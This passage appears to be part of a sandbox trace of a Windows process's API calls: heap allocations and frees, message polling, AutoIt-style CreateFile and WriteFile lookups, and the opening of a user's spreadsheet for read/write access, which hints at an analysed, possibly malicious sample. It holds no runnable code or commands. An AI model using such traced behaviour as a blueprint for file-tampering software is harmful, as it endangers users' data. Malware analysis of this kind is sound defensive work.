(HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0171.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0171.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0171.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0171.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0171.366] FreeLibrary (hLibModule=0x75c90000) returned 1 [0171.366] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0171.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0171.366] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.367] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0171.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0171.367] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0171.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.368] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0171.368] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.368] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kqvkybnjluto.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0171.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0171.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0171.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ce098 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0171.369] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0171.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.371] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.375] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.375] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0171.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.376] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 